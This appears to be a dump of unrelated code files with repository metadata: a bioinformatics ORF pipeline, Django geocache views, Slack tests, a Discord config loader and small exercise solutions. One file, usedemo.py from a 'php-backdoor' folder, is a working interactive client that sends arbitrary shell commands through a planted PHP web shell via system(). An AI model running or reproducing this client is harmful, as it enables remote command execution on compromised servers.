            db.rollback()
            resp.body = json.dumps({'error': str(e)})
            resp.status = falcon.HTTP_500
        return resp
| UTF-8 | Python | false | false | 3,905 | py | 6 | resources.py | 5 | 0.485531 | 0.477081 | 0 | 124 | 30.483871 | 111 |
songbo446/RiboNT | 5,695,126,640,310 | f712430011b536eae96eab2539dd8a3ab1bb303f | 15a2139027f0b43072b73cdf1e3759f7aa850136 | /RiboNT | 71735cb971555203a8bf27f5f069bfc6c8660b83 | [
"MIT"
]
| permissive | https://github.com/songbo446/RiboNT | 5fb16a9f4a3c8d01744635c2bf994e575960d72a | d848f29be96d1d117e046a475a1e4bcb7e845fbf | refs/heads/master | 2022-11-17T23:55:48.411010 | 2022-11-04T07:08:31 | 2022-11-04T07:08:31 | 182,942,241 | 2 | 0 | null | null | null | null | null | null | null | null | null | null | null | null | null | #!/usr/bin/python3
import sys, os, getopt, time
def main ():
    """Parse CLI options and run the RiboNT ORF-prediction pipeline.

    Stages: extract start codons from the GTF, derive P-site offsets from
    the BAM, evaluate RPF quality with R, compute codon usage, allocate
    P-sites, predict ORFs, then write GFF/FASTA/summary outputs. Each stage
    is skipped when its output file already exists (crude resumability).
    """
    usage = """

RiboNT version 1.0 by Bo Song

Usage:

    RiboNT [options]* --genome <reference> --gtf <annotation> --bam <alignment>

    <reference>     Sequence of reference genome (fasta)
    <annotation>    Annotation of reference genome (gtf)
    <alignment>     Alignment of RPFs (bam)

Options:

   --start          Start codons (spearate by comma) [default: AUG]
   --pcov           Minimum RPF coverage of Psites (0-1) [default: 0]
   --nCores         Number of multiprocessors [default: 5]
   --outdir         Output directory [default: ./RiboNT]
   --prefix         Prefix of output files [default: ribont]
   --Rscript        Path to Rscript
   --bedtools       Path to bedtools
   --samtools       Path to samtools

"""
    # Defaults for all options; pcov uses a tiny epsilon instead of 0 so
    # that zero-coverage P-sites are still excluded downstream.
    startCodon, outdir, prefix = 'AUG', 'RiboNT', 'ribont'
    pathR = ""
    pathBedtools = ""
    pathSamtools = ""
    nCores = 5
    pcov = 0.00000000001
    try:
        opts, args = getopt.getopt(sys.argv[1:], "h", ["help", "genome=", "gtf=", "bam=", "pcov=", "nCores=", "start=", "outdir=", "prefix=", "Rscript=", "bedtools=", "samtools="])
    # NOTE(review): bare except — any getopt error (or KeyboardInterrupt)
    # prints usage and exits without reporting the offending option.
    except:
        sys.stdout.write(usage)
        sys.exit()

    if len(sys.argv[1:]) < 3:
        sys.stdout.write(usage)
        sys.exit()

    for opt, arg in opts:
        if opt in ('-h', '-help'):
            sys.stdout.write(usage)
            sys.exit()
        elif opt in ('--genome'):
            if arg is None:
                sys.stdout.write(usage)
                sys.exit()
            else:
                sys.stdout.write("Genome is: "+arg+'\n')
                genome = arg
        elif opt in ('--gtf'):
            gtf = arg
            sys.stdout.write("GTF is: "+gtf+'\n')
        elif opt in ('--bam'):
            bam = arg
            sys.stdout.write("bam is: "+bam+'\n')
        # NOTE(review): usage advertises --start but this tests --startCodon,
        # so the documented flag is silently ignored — confirm which is meant.
        elif opt in ('--startCodon'):
            startCodon = arg
            sys.stdout.write("Start codons are: "+startCodon+'\n')
        elif opt in ('--outdir'):
            outdir = arg
            sys.stdout.write("Output directory is: "+outdir+'\n')
        elif opt in ('--prefix'):
            prefix = arg
        elif opt in ('--pcov'):
            pcov = float(arg)
        elif opt in ('--nCores'):
            nCores = int(arg)
        elif opt in ('--Rscript'):
            pathR = arg
        elif opt in ('--bedtools'):
            pathBedtools = arg
        elif opt in ('--samtools'):
            pathSamtools = arg

    # NOTE(review): if --genome/--gtf/--bam are omitted these names are
    # unbound and the next lines raise NameError rather than printing usage.
    genome = os.path.abspath(genome)
    gtf = os.path.abspath(gtf)
    bam = os.path.abspath(bam)
    # Timestamped log file name shared by all shelled-out commands below.
    timetick = str(time.time()).split(".")[0]
    logout = "log"+str(timetick)

    # Make the bundled ./bin helpers importable before importing ribont.
    Bin = sys.path[0]
    sys.path.append(Bin+'/bin')
    import ribont

    sys.stdout.write("RiboNT starts ..."+'\n')
    if not os.path.exists(outdir): os.makedirs(outdir)
    os.chdir(outdir)
    entropy = 1
    # Each stage is gated on its output file so reruns resume where they left off.
    if not os.path.exists(prefix): ribont.StartExtract(gtf, prefix)
    if not os.path.exists(prefix+'_OffSet.txt'): ribont.OffSetExtract(bam, prefix + '.start.bed', prefix, logout, pathBedtools = pathBedtools, pathSamtools = pathSamtools)

    sys.stdout.write("\tEvaluating RPFs qualities" + '\n')
    if os.path.exists(prefix + '.R.txt'):
        if not os.path.exists('Plot'): os.makedirs('Plot')
        if not pathR:
            try:
                os.system('Rscript '+ Bin + '/bin/multitaper.R ' + prefix + '.R.txt 1>>' + logout)
                os.system('Rscript '+ Bin + '/bin/metaplotHP.R ' + prefix + '.L.txt ' + prefix + '.R.txt 1>>' + logout)
            # NOTE(review): os.system does not raise when Rscript is missing
            # (it returns a nonzero status), so this except likely never fires.
            except:
                sys.stdout.write("ERROR: Rscript is not a excutable command, please provide the path to Rscript using --Rscript option")
                sys.exit()
        else:
            os.system(pathR + '/Rscript '+ Bin + '/bin/multitaper.R ' + prefix + '.R.txt 1>>' + logout)
            os.system(pathR + '/Rscript '+ Bin + '/bin/metaplotHP.R ' + prefix + '.L.txt ' + prefix + '.R.txt 2>>' + logout)

    sys.stdout.write("\tExtracting genome-wide codon usages"+'\n')
    if not os.path.exists(prefix + '_codonUsage.pickle'): ribont.UsageExtract(genome,gtf,nCores,prefix)
    if not os.path.exists(prefix + '_dep.pickle'): entropy = ribont.PsiteAllocate(prefix + '.bed',prefix + '_OffSet.txt',prefix + '_multitaper.Freq.txt', prefix)

    sys.stdout.write("\tPredicting ORFs"+'\n')
    if not os.path.exists(prefix + '_orf.fa'): ribont.OrfFinder(entropy,startCodon,genome,gtf,pcov,nCores,prefix)

    sys.stdout.write("\tORF prediction completed. Outputting ..."+'\n')
    if not os.path.exists(prefix+'_sORF.gff'):
        ribont.gffMaker(gtf, prefix + '.start.bed', prefix + '.stop.bed', prefix + '_orf.fa', prefix + '_sORF.gff',prefix + '_orf_aa.fa', prefix + '_orf_table.txt', prefix + '_summary.txt')
    # Clean up intermediate files; the timestamped log is kept.
    os.system('rm *.bed *.pickle *.R.txt *.L.txt ' + prefix)
    sys.stdout.write("RiboNT completed" + '\n')
# Script entry point: run the pipeline only when executed directly.
if __name__ == "__main__":
    main()
| UTF-8 | Python | false | false | 5,004 | 15 | RiboNT | 4 | 0.551559 | 0.545564 | 0 | 126 | 38.714286 | 189 |
|
xubzero/scripts | 15,496,242,046,318 | b0e9fa2d08f59ee331c02e9d87d39b1fe496cf0d | 6aeaf97b75bbb83596acee68d98f8582ac93dccb | /php-backdoor/oneliner/usedemo.py | 1f28f13c8cc5659cce27d1cfc059b0547579a59b | []
| no_license | https://github.com/xubzero/scripts | a1e5358f3e5f8d4bdcc7a344cfbf9a996569dfd3 | ca4777dff0197bb4b698cb0d02f8a01b388eb61a | refs/heads/main | 2023-07-23T09:40:54.758987 | 2022-06-20T13:59:46 | 2022-06-20T13:59:46 | 372,331,763 | 5 | 0 | null | null | null | null | null | null | null | null | null | null | null | null | null | #!/usr/bin/python3
import requests
import sys

# Positional args: argv[0] is this script, argv[1] the PHP backdoor URL.
arguments=sys.argv
scriptname=arguments[0]

session=requests.Session()

if(len(arguments) == 2):
    url=arguments[1]
    command=""
    # Probe the endpoint with `whoami`; an empty reply means it is not answering.
    payload=f"system('whoami');"
    user=(session.post(url,data={"cmd":f"{payload}"}).text).strip()
    if user.strip() == '':
        print(f"No valid user found.Check connection")
        exit()
    # Interactive loop: each typed line is executed remotely until 'q'
    # (note 'q' itself is still sent once before the loop exits).
    while command != 'q':
        command=input(f"{user} > ")
        payload=f"system('{command} 2>/dev/null');"
        response=session.post(url,data={"cmd":f"{payload}"})
        content=response.text
        try:
            # NOTE(review): response.text is already str in Python 3, so
            # .decode() raises AttributeError and the except branch runs.
            content=content.decode().strip()
        except:
            content=content.strip()
        print(f'{content}\n')
else:
    print(f'\tUsage   : {scriptname} httpbackdoorlocation com')
    print(f'\t        : {scriptname} http://localhost/tests/c0ntacts.php')
    print(f'\t        : {scriptname} http://localhost/tests/c0ntacts.php ')
| UTF-8 | Python | false | false | 838 | py | 32 | usedemo.py | 16 | 0.675418 | 0.667064 | 0 | 30 | 26.933333 | 70 |
scresante/codeeval | 14,499,809,607,497 | c0ba0ab75eeac0cdad87b2b88412670d8504269d | 83eee8ec138ebc1d9286e6698fdf0fabbbf6635e | /basic-syntax-fixer.py | e2e139ac3304be6ed74194d3e4e580a62009dffb | []
| no_license | https://github.com/scresante/codeeval | b9259cc745f3ef5fc67881ad3904b6712050a9f4 | 3771200fd8ce64bcfafbbed7822b3ddbadb5c564 | refs/heads/master | 2021-09-04T18:34:18.161413 | 2018-01-21T01:39:00 | 2018-01-21T01:39:00 | 46,468,549 | 0 | 0 | null | null | null | null | null | null | null | null | null | null | null | null | null | #!/usr/bin/python3
#" for reformatting codeeval in vim
# nnoremap fv <Esc>:%s/f = argv/FILE = argv/<CR>
# :%s/f = 'test/FILE = 'test/<CR>
# :%s/data = open(f,/DATA = open(FILE, /<CR>
# :3,9s/except/except NameError/<CR>
# :%s/for line in data/for line in DATA/<CR>
# :let g:pymode_lint=0<CR>
# :let g:pymode_lint_on_write=0<CR>
# :let g:pymode_rope=0<CR>
from os import listdir
import re

FILELIST = listdir('.')
# Keep only CodeEval solution files, which use .py2 / .py3 suffixes.
PYTHONFILES = [name for name in FILELIST
               if name.endswith(('.py3', '.py2'))]
# REGEX = re.compile(r"""#!/usr/bin/python(.)
# from sys import import argv
# try:
# f = argv[1]
# except:
# f = 'tests/(\w*)'
# data = open(f,'r').read().splitlines()""", re.VERBOSE)
| UTF-8 | Python | false | false | 714 | py | 109 | basic-syntax-fixer.py | 105 | 0.605042 | 0.592437 | 0 | 23 | 30 | 79 |
HoodyH/Discord-Farm-Bot | 19,121,194,408,941 | 33aeb0aa097ae5d48384e92bebef87fae81f3190 | 062470c562518284a3147728f7a1db2da3f51d85 | /data/configs.py | c6ecf4971d08a37133cf194c6a17eabf7881611a | []
| no_license | https://github.com/HoodyH/Discord-Farm-Bot | f1f067e9c55ce30f380af8624772d9b4ab05d074 | 4a74cdb2b470a8de5e2d60597312623fd9424b29 | refs/heads/master | 2023-04-05T13:42:32.927674 | 2021-04-03T20:33:20 | 2021-04-03T20:33:20 | 199,805,641 | 0 | 0 | null | false | 2021-04-03T20:33:21 | 2019-07-31T07:41:50 | 2021-03-31T23:23:52 | 2021-04-03T20:33:21 | 25 | 0 | 0 | 0 | Python | false | false | import json
with open('config.json', 'r') as file:
_data = json.load(file)
class Account:
    """Wraps the raw JSON dict describing the main (trainer) user account."""
    def __init__(self, data):
        self.token: str = data.get('token')
        self.id: int = data.get('id')
        # FIX: the username is a string, not an int (annotation corrected).
        self.username: str = data.get('username')
        # Raw routine/action definitions; default to empty lists when absent.
        self.routine_raw: list = data.get('routine', [])
        self.actions_raw: list = data.get('actions', [])
class Configs:
    """Top-level parsed configuration for the bot, built from config.json."""
    def __init__(self, config_raw):
        _trainer = config_raw.get('trainer')
        self.trainer: Account = Account(_trainer)
        self.global_actions: list = config_raw.get('global_actions', [])
        self.allowed_ids: list = config_raw.get('allowed_ids', [])
        # NOTE(review): the [] defaults make these lists when the key is
        # missing, yet they are appended below as scalar ids — confirm intent.
        self.target_id = config_raw.get('target', [])
        self.log_channel = config_raw.get('log_channel', [])
        # The trainer and the target are always allowed to issue commands.
        self.allowed_ids.append(self.trainer.id)
        self.allowed_ids.append(self.target_id)


# Module-level singleton built from config.json at import time.
configs = Configs(_data)
| UTF-8 | Python | false | false | 958 | py | 12 | configs.py | 10 | 0.592902 | 0.592902 | 0 | 34 | 27.176471 | 72 |
michaelhenry/AutoBotServer | 4,363,686,813,071 | 12c4dab3797ae362675ec70d8c473d24f1ff47b1 | 62ba31cd875086b24d53ce2c4c6a3d840590a518 | /apps/autobot/admin.py | 6b660832dc990166959461ead0cb84a6c04f9109 | []
| no_license | https://github.com/michaelhenry/AutoBotServer | f7a3e83498cd664e91ee9c5bb846c5dfc7246308 | bd5115582c1ff10c89312d3a9418670414b2acd1 | refs/heads/master | 2023-08-11T11:07:54.874773 | 2021-04-16T11:24:41 | 2021-04-16T11:37:19 | 208,256,202 | 1 | 0 | null | false | 2023-07-22T16:06:57 | 2019-09-13T12:02:08 | 2023-06-03T16:46:25 | 2023-07-22T16:06:56 | 9 | 1 | 0 | 2 | Python | false | false | from django.contrib import admin
from .models import (
UIAction,
UIProperty,
UIElement,
Scenario,
TestAction,
)
admin.site.register(UIAction)
admin.site.register(UIProperty)
admin.site.register(UIElement)
admin.site.register(Scenario)
admin.site.register(TestAction)
| UTF-8 | Python | false | false | 288 | py | 6 | admin.py | 4 | 0.760417 | 0.760417 | 0 | 14 | 19.571429 | 32 |
10419/Tarea-10-ejercicios | 8,873,402,442,886 | 92064f88521871695c87fd5fa21966d42f921f2c | 4a4d6edfcc3d0065d66f6c6bcefd2f420db68576 | /ejercicio 8.py | a42e0fba374828fe86076809d2c87be9746cde7b | [
"Apache-2.0"
]
| permissive | https://github.com/10419/Tarea-10-ejercicios | 6e45c0e968161945d878563157ace34262e30e0e | 9e21860cfb1715a3bd710d508d5c71bc35010801 | refs/heads/main | 2023-04-20T14:33:42.304617 | 2021-05-09T17:45:45 | 2021-05-09T17:45:45 | 364,576,242 | 0 | 0 | null | null | null | null | null | null | null | null | null | null | null | null | null | def estCondicional101():
    # Bus fare quote: per-person price decreases as the group gets larger.
    print("Transportes Power")
    t=0
    a=int(input("ingrese la cantidad de personas:"))
    print("tarifa de auto buz")
    print("si son mas de 100 personas la tarifa por personas es de 20")
    print("si son entre 100 y 50 personas la tarifa por personas es de 35")
    print("si son entre 49 y 20 personas la tarifa por personas es de 40")
    print("si son menos de 20 personas la tarifa por personas es de 70")
    # NOTE(review): the strict comparisons leave gaps — group sizes of exactly
    # 20, 49, 50 or 100 match no branch, so the total stays 0. Confirm whether
    # the boundaries were meant to be inclusive.
    if a>100:
        t=a*20
    elif a>50 and a<100:
        t=a*35
    elif a>20 and a<49:
        t=a*40
    elif a<20:
        t=a*70
    print("el costo del viaje le saldra",t,"soles")
# Run the quote dialog immediately when the script is executed.
estCondicional101()
bennybauer/Shhh | 16,673,063,078,896 | d313255b90e66db0747ecbc3760dfa5c63984039 | e6d45004decda49ee74492a34a8cbed2d63e30e0 | /functions/tests/unit/test_slack.py | 83bff7a2aa607f90513f6c314a9d583a338138de | []
| no_license | https://github.com/bennybauer/Shhh | 04a6edcd2b8c36576952f9e8c30a2dbe382f5860 | 82d14e2ce4f6ddbe4edc9cdf4b7d3c6db25caabe | refs/heads/master | 2020-04-05T23:08:54.458701 | 2016-06-19T09:08:42 | 2016-06-19T09:08:42 | 58,865,902 | 0 | 0 | null | null | null | null | null | null | null | null | null | null | null | null | null | import os
from unittest import TestCase
from urlparse import parse_qs
from lib.model.slack import SlackOAuthResponse, SlackResponseMessage, SlackException, SlackCommand, SlackResponseType
__author__ = 'bauerb'
class TestSlack(TestCase):
    """Unit tests for SlackOAuthResponse, SlackResponseMessage, SlackException
    and SlackCommand.

    CONSISTENCY FIX: the deprecated `assertEquals` alias is replaced with the
    canonical `assertEqual` (already used elsewhere in this class; the alias
    was removed from unittest in Python 3.12).
    """

    @classmethod
    def setUpClass(cls):
        # SlackCommand validates requests against this verification token.
        os.environ['SLACK_VERIFICATION_TOKEN'] = 'abcdef'

    # SlackOAuthResponse tests
    ##########################
    def create_valid_response(self):
        """Fixture: OAuth payload with all fields SlackOAuthResponse requires."""
        return {
            "body": {
                "access_token": "xoxp-XXXXXXXX-XXXXXXXX-XXXXX",
                "user_id": "usXX-XXXXXXXX-XXXXXXXX-XXXXX",
                "team_name": "Team Installing Your Hook",
                "team_id": "XXXXXXXXXX",
                "incoming_webhook": {
                    "url": "https://hooks.slack.com/TXXXXX/BXXXXX/XXXXXXXXXX",
                    "channel": "#channel-it-will-post-to",
                    "channel_id": "XXX-YYY",
                    "configuration_url": "https://teamname.slack.com/services/BXXXXX"
                }
            }
        }

    def create_invalid_response(self):
        """Fixture: OAuth payload missing access_token and webhook url."""
        return {
            "body": {
                "user_id": "usXX-XXXXXXXX-XXXXXXXX-XXXXX",
                "team_name": "Team Installing Your Hook",
                "team_id": "XXXXXXXXXX",
                "incoming_webhook": {
                    "channel": "#channel-it-will-post-to",
                    "channel_id": "XXX-YYY",
                    "configuration_url": "https://teamname.slack.com/services/BXXXXX"
                }
            }
        }

    def test_valid_slack_oauth_response(self):
        response = self.create_valid_response()
        SlackOAuthResponse(response['body'])

    def test_invalid_slack_oauth_response(self):
        response = self.create_invalid_response()
        with self.assertRaises(KeyError):
            SlackOAuthResponse(response['body'])

    # SlackResponseMessage tests
    ############################
    def test_slack_response_message(self):
        message = 'some text'
        response_message = SlackResponseMessage(message).build()
        self.assertEqual({'response_type': 'ephemeral', 'text': message}, response_message)

    def test_slack_response_message_invalid_channel(self):
        # NOTE(review): identical to test_slack_response_message — the
        # "invalid channel" scenario never gets exercised; confirm intent.
        message = 'some text'
        response_message = SlackResponseMessage(message).build()
        self.assertEqual({'response_type': 'ephemeral', 'text': message}, response_message)

    def test_slack_response_message_in_channel(self):
        message = 'some text'
        respone_type = SlackResponseType.in_channel
        response_message = SlackResponseMessage(message, respone_type).build()
        self.assertEqual({'response_type': 'in_channel', 'text': message}, response_message)

    # SlackException tests
    ######################
    def test_slack_exception(self):
        error_message = 'some error'
        exception = SlackException(error_message)
        self.assertEqual(error_message, exception.message)
        self.assertIsInstance(exception, SlackException)
        self.assertIsInstance(exception, Exception)

    # SlackCommand tests
    ######################
    def test_slack_command_missing_token(self):
        body = parse_qs(
            "team_id=bla&team_domain=bla&channel_id=bla&"
            "channel_name=bla&user_id=bla&user_name=bla&command=%2Fbla&"
            "text=bla&response_url=https%3A%2F%2Fhooks.slack.com%2Fcommands%2Fbla")
        with self.assertRaises(SlackException) as e:
            SlackCommand(body)
        self.assertEqual("Error: Access denied. Message: Token is missing", e.exception.message)

    def test_slack_command_invalid_token(self):
        body = parse_qs(
            "token=bla&team_id=bla&team_domain=bla&channel_id=bla&"
            "channel_name=bla&user_id=bla&user_name=bla&command=%2Fbla&"
            "text=bla&response_url=https%3A%2F%2Fhooks.slack.com%2Fcommands%2Fbla")
        with self.assertRaises(SlackException) as e:
            SlackCommand(body)
        self.assertEqual("Error: Access denied. Message: Invalid token", e.exception.message)

    def test_slack_command_valid_token(self):
        body = parse_qs(
            "token=abcdef&team_id=bla&team_domain=bla&channel_id=bla&"
            "channel_name=bla&user_id=abc&user_name=John&command=%2Fbla&"
            "text=mycommand&response_url=https%3A%2F%2Fhooks.slack.com%2Fcommands%2Fbla")
        command = SlackCommand(body)
        self.assertEqual('abc', command.user_id)
        self.assertEqual('John', command.user_name)
        self.assertEqual('mycommand', command.text)

    def test_slack_command_missing_user_id(self):
        body = parse_qs(
            "token=abcdef&team_id=bla&team_domain=bla&channel_id=bla&"
            "channel_name=bla&user_name=John&command=%2Fbla&"
            "text=mycommand&response_url=https%3A%2F%2Fhooks.slack.com%2Fcommands%2Fbla")
        with self.assertRaises(KeyError) as e:
            SlackCommand(body)
        self.assertEqual('user_id', e.exception.message)
| UTF-8 | Python | false | false | 5,038 | py | 4 | test_slack.py | 3 | 0.605994 | 0.601231 | 0 | 129 | 38.054264 | 117 |
wesbasinger/pvcache | 5,231,270,183,941 | 4bc0175b4df0be2d96b33f3322a6d3da4d899dd4 | 0ed0407faa5868759b3ea7926585df668e7fb308 | /cache/views.py | e748c8ed456c5bd913ca5ebb7ab78b8cf61e9e87 | []
| no_license | https://github.com/wesbasinger/pvcache | 6594fb298c98d57cc50d88c4dfd68cfb391cf1af | d608cf88767e823d261bb2cbe3c6968ed89b71ed | refs/heads/master | 2021-01-19T02:22:30.464610 | 2016-07-14T12:42:48 | 2016-07-14T12:42:48 | 49,754,013 | 0 | 0 | null | null | null | null | null | null | null | null | null | null | null | null | null | from django.shortcuts import render, get_object_or_404
from django.http import HttpResponse, HttpResponseRedirect
from django.contrib.auth.decorators import login_required
from django.contrib.auth.models import User
from .models import Geocache, Log
from .forms import CacheForm, NewUserForm
from xml.etree.ElementTree import Element, SubElement, Comment, tostring
def index(request):
    """Home page: render every geocache listing."""
    return render(request, 'index.html', {'listings': Geocache.objects.all()})
def listing(request, geocache_id):
    """Display a geocache listing with its logs; on POST, append a new log.

    Changes vs. original: the POST branch no longer duplicates the whole
    GET rendering path, and the cache is fetched with get_object_or_404
    (consistent with the gpx view) so a bad id yields 404 instead of 500.
    """
    listing = get_object_or_404(Geocache, pk=geocache_id)
    if request.method == 'POST':
        # Record a new log entry authored by the current user.
        new_entry = Log(
            text=request.POST['log_text'],
            geocache=listing,
            author=request.user.username,
        )
        new_entry.save()
    # Newest entries first.
    logs = listing.log_set.all().order_by('-id')
    return render(request, 'listing.html', {
        'listing': listing,
        'logs': logs,
    })
@login_required
def new(request):
    """Render the new-geocache form; create the cache on a valid POST."""
    if request.method != "POST":
        # Fresh, unbound form for the initial page load.
        return render(request, 'new.html', {'form': CacheForm()})
    form = CacheForm(request.POST)
    if not form.is_valid():
        # Re-render with the bound form so field errors are shown.
        return render(request, 'new.html', {'form': form})
    geocache = form.save(commit=False)
    geocache.save()
    return HttpResponseRedirect('/')
@login_required
def delete(request, geocache_id):
    """Delete a geocache and redirect to the index.

    Changes vs. original: a missing id now yields 404 instead of an
    unhandled DoesNotExist, and the unused `listings` query was removed.

    NOTE(review): deletion via GET is CSRF-prone; this should ideally
    require a POST with Django's CSRF protection.
    """
    listing = get_object_or_404(Geocache, pk=geocache_id)
    listing.delete()
    return HttpResponseRedirect('/')
def newuser(request):
    """Show the signup form; on a valid POST create the account and go home."""
    if request.method != "POST":
        # Initial page load: unbound form.
        return render(request, 'newuser.html', {'form': NewUserForm()})
    form = NewUserForm(request.POST)
    if not form.is_valid():
        # Re-render with the bound form so validation errors are visible.
        return render(request, 'newuser.html', {'form': form})
    account = User.objects.create_user(
        username=request.POST['username'],
        password=request.POST['password'],
    )
    account.save()
    return HttpResponseRedirect('/')
def about(request):
    # Static "about" page; no template context needed.
    return render(request, 'about.html', {})
def gpx(request, geocache_id):
    """Serve a single-waypoint GPX 1.1 document for the given geocache.

    Returns the XML as an attachment named after the cache title.

    Bug fixes vs. original: the GPX namespace/schema URIs contained typos
    ("ww.topografix", "togografix") and the schemaLocation was emitted as
    a bogus ``xmlns:xsiSchemaLocation`` attribute instead of the standard
    ``xsi:schemaLocation``.
    """
    cache = get_object_or_404(Geocache, pk=geocache_id)
    root = Element('gpx')
    root.set('xmlns', 'http://www.topografix.com/GPX/1/1')
    root.set('creator', 'Wes Basinger')
    root.set('version', '1.1')
    root.set('xmlns:xsi', 'http://www.w3.org/2001/XMLSchema-instance')
    root.set('xsi:schemaLocation',
             'http://www.topografix.com/GPX/1/1 http://www.topografix.com/GPX/1/1/gpx.xsd')
    md = SubElement(root, 'metadata')
    nm = SubElement(md, 'name')
    nm.text = cache.title
    ds = SubElement(md, 'description')
    ds.text = cache.description
    wpt = SubElement(root, 'wpt')
    wpt.set('lat', str(cache.latitude))
    wpt.set('lon', str(cache.longitude))
    # Single-point cache, so the bounding box degenerates to the waypoint.
    bounds = SubElement(root, 'bounds')
    bounds.set('minlat', str(cache.latitude))
    bounds.set('minlon', str(cache.longitude))
    bounds.set('maxlat', str(cache.latitude))
    bounds.set('maxlon', str(cache.longitude))
    nr = SubElement(wpt, 'name')
    nr.text = "VT Cache"
    sy = SubElement(wpt, 'sym')
    sy.text = 'Waypoint'
    str_output = tostring(root)
    response = HttpResponse(str_output, content_type='text/xml')
    response['Content-Disposition'] = 'attachment; filename="%s.gpx"' % cache.title
    return response
| UTF-8 | Python | true | false | 3,183 | py | 12 | views.py | 6 | 0.705624 | 0.699654 | 0 | 106 | 29.028302 | 115 |
avulalakshman/python-ws | 17,970,143,192,450 | 854b7715803ebc8fcbcba0707f9424b36c649def | c4c2e8993e9561855c3800e1f33726de8b855cd5 | /primecount.py | 03af0ebae4bc27ce9d03320de1756f85c1d7283d | []
| no_license | https://github.com/avulalakshman/python-ws | 879a26bdc7164cd49b33fcfc474f526253d21093 | 2977fb8b5a6a4bc933788fad5e4e0f883f07c26d | refs/heads/master | 2022-02-01T00:14:17.134905 | 2019-07-22T08:52:41 | 2019-07-22T08:52:41 | 198,148,819 | 0 | 0 | null | null | null | null | null | null | null | null | null | null | null | null | null |
def isPrime(num):
    """Return True if *num* is a prime number, False otherwise.

    Numbers below 2 are not prime.  Trial division only needs to run up to
    sqrt(num): any composite has a factor no larger than its square root,
    so this is O(sqrt(n)) instead of the original O(n/2).
    """
    if num < 2:
        return False
    from math import isqrt  # local import: module has no top-level imports
    for i in range(2, isqrt(num) + 1):
        if num % i == 0:
            return False
    return True
| UTF-8 | Python | false | false | 248 | py | 3 | primecount.py | 3 | 0.508065 | 0.487903 | 0 | 9 | 26.444444 | 67 |
NadyaNikol/AutoMailing_Bot_and_AdminPanel_Python | 15,917,148,799,949 | 10c902c4689e268a2d15928929d634ea7dcec9cc | fe90f72c29fc1dbbb72c9ba4c08988718121c356 | /djangoMail/entrance/migrations/0002_auto_20201221_2020.py | 21acbf37246c7bb7eebc71ad4e475f00320f4402 | []
| no_license | https://github.com/NadyaNikol/AutoMailing_Bot_and_AdminPanel_Python | 943fbff57006d407fbffb88fea5d640a988736ed | ff3b14e75be7241fab714a686944a9ed57597949 | refs/heads/main | 2023-05-05T13:23:56.983621 | 2021-06-03T20:01:04 | 2021-06-03T20:01:04 | 325,529,241 | 0 | 0 | null | null | null | null | null | null | null | null | null | null | null | null | null | # Generated by Django 3.1.4 on 2020-12-21 18:20
from django.db import migrations
class Migration(migrations.Migration):
    # Renames the `Users` model to `UsersMailing`; Django derives the
    # corresponding table rename from this operation.
    dependencies = [
        ('entrance', '0001_initial'),
    ]
    operations = [
        migrations.RenameModel(
            old_name='Users',
            new_name='UsersMailing',
        ),
    ]
| UTF-8 | Python | false | false | 325 | py | 24 | 0002_auto_20201221_2020.py | 15 | 0.578462 | 0.52 | 0 | 17 | 18.117647 | 47 |
SpicyKong/problems | 8,521,215,159,220 | ec3f8b4b1ad9f870df0da057f04184225d6b116c | cee2ae974f6b416e59a001151f1ea84a253dfd08 | /BOJ/Q_5427.py | d4c8fb3f0ac06d0bbc2899ac8f76bd2bd5b7d8fd | []
| no_license | https://github.com/SpicyKong/problems | e8897fab9e69d07c67fc2f13dc485cc3ac1e8c5a | 732ad9c11bb4b3a8e8b68f565b15c1b481e110d5 | refs/heads/master | 2021-08-16T07:10:03.387082 | 2020-07-03T12:49:18 | 2020-07-03T12:49:18 | 199,583,988 | 3 | 0 | null | null | null | null | null | null | null | null | null | null | null | null | null | # https://www.acmicpc.net/problem/5427 문제 제목 : 불 , 언어 : Python, 날짜 : 2020-04-29, 결과 : 성공
"""
이 문제는 흔한 유형의 BFS문제다. 불을 키우는 조건이 맞는 지 확인하고 플레이어가 다음번 턴에 갈 수 있는곳을 모두 방문하면 된다.
과제가 많아서 양심에 찔리지만 비교적 쉬운 BFS문제를 풀었다.. 하지만 과제가 중간고사를 대체하는것이라 열심히 해야하기 때문에 어쩔수 없었다..
그리고 오늘 운좋게 소마 2차 온라인 코테 합격메일이 왔다. 문제는 내 스펙이 전혀 없기때문에 붙을 가능성은 희박할거 같다. 하지만 그래도
다음번 지원을 위해 면접을 한번 경험해 보는것은 추후에 분명히 도움이 되리라 생각하고 열심히 준비 해야 겠다.
"""
import sys
from collections import deque
dx = [1, -1, 0, 0]  # x offsets of the four orthogonal neighbours
dy = [0, 0, 1, -1]  # matching y offsets (paired index-wise with dx)
def fire(imsi_queue):
    """Advance the fire front by one step; return the newly ignited cells.

    Visit codes (set in bfs): 0 unvisited, 1 player-reached, 2 fire, 3 wall.
    Fire spreads into 0 or 1 cells only, never into walls or burning cells.
    Reads module globals N, M, list_visit.
    """
    result_queue = deque()
    while imsi_queue:
        now_x, now_y = imsi_queue.popleft()
        for i in range(4):
            nx = dx[i] + now_x
            ny = dy[i] + now_y
            if 0 <= nx < N and 0 <= ny < M:  # stay on the board
                if not list_visit[ny][nx] or list_visit[ny][nx]==1:
                    list_visit[ny][nx] = 2
                    result_queue.append([nx, ny])
    return result_queue
def bfs():
    """Level-by-level BFS of the player, advancing the fire once per level.

    Returns the number of steps needed to walk off the grid, or the string
    'IMPOSSIBLE' when the player can never escape.  Reads/writes module
    globals N, M, list_map, list_visit (set up by the driver loop below).
    """
    global N, M, list_map, list_visit
    list_queue = deque()
    list_fire = deque()
    # Seed both queues from the map: '*' fire, '@' player start, '#' wall.
    for y in range(M):
        for x in range(N):
            if list_map[y][x] == '*':
                list_fire.append([x, y])
                list_visit[y][x] = 2
            elif list_map[y][x] == '@':
                list_queue.append([x, y, 0])
                list_visit[y][x] = 1
            elif list_map[y][x] == '#':
                list_visit[y][x] = 3
    # count_queue counts player cells left in the current BFS level;
    # next_queue accumulates the size of the following level.  When the
    # current level is exhausted the fire front is advanced one step.
    # NOTE(review): fire advances after the first pop of a level -- verify
    # the move/burn ordering against the problem statement.
    count_queue = 1
    next_queue = 0
    while list_queue:
        now_x, now_y, now_count = list_queue.popleft()
        count_queue -= 1
        if 0 >= count_queue:
            list_fire = fire(list_fire)
            count_queue = next_queue
            next_queue = 0
        for i in range(4):
            nx = now_x + dx[i]
            ny = now_y + dy[i]
            if 0 <= nx < N and 0 <= ny < M:
                if not list_visit[ny][nx]:
                    list_visit[ny][nx] = 1
                    list_queue.append([nx, ny, now_count+1])
                    next_queue+=1
            else:
                # Stepping off the board means the player has escaped.
                return now_count+1
    return 'IMPOSSIBLE'
